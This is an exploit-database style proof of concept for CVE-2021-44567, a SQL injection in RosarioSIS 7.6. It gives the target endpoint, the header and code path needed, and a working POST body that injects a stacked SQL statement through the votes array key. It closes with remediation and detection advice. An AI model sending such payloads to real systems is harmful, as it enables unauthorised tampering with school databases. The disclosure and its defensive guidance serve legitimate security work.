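# Exploit Title: RosarioSIS 7.6 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 7.6
# Tested on: Ubuntu Windows
# CVE : CVE-2021-44567

PoC:

POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest

Constraints and code flow that must hold for the request to reach the vulnerable call:

isset( $_POST['votes'] ) && is_array( $_POST['votes'] )
&& $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest'
&& foreach ( (array) $_POST['votes'] as $poll_id => $votes_array )
&& if ( ! empty( $votes_array ) )
&& PortalPollsVote( $poll_id, $votes_array )

Request body:

votes['; CREATE TABLE aaa(t text) --]=1

Note: the injection point is the array key of the votes parameter, not its value. The key becomes $poll_id in the foreach and is passed to PortalPollsVote(); as the PoC shows, it is not restricted to an integer before it reaches SQL. The X-Requested-With comparison checks a request header that any client can set, so it does not limit who can reach this code path. To remediate, update to a RosarioSIS release that fixes CVE-2021-44567, and make sure poll ids are cast to integers or bound as query parameters before use. For detection, inspect request bodies (WAF or application logging) for POSTs to this path whose votes[...] keys are not purely numeric.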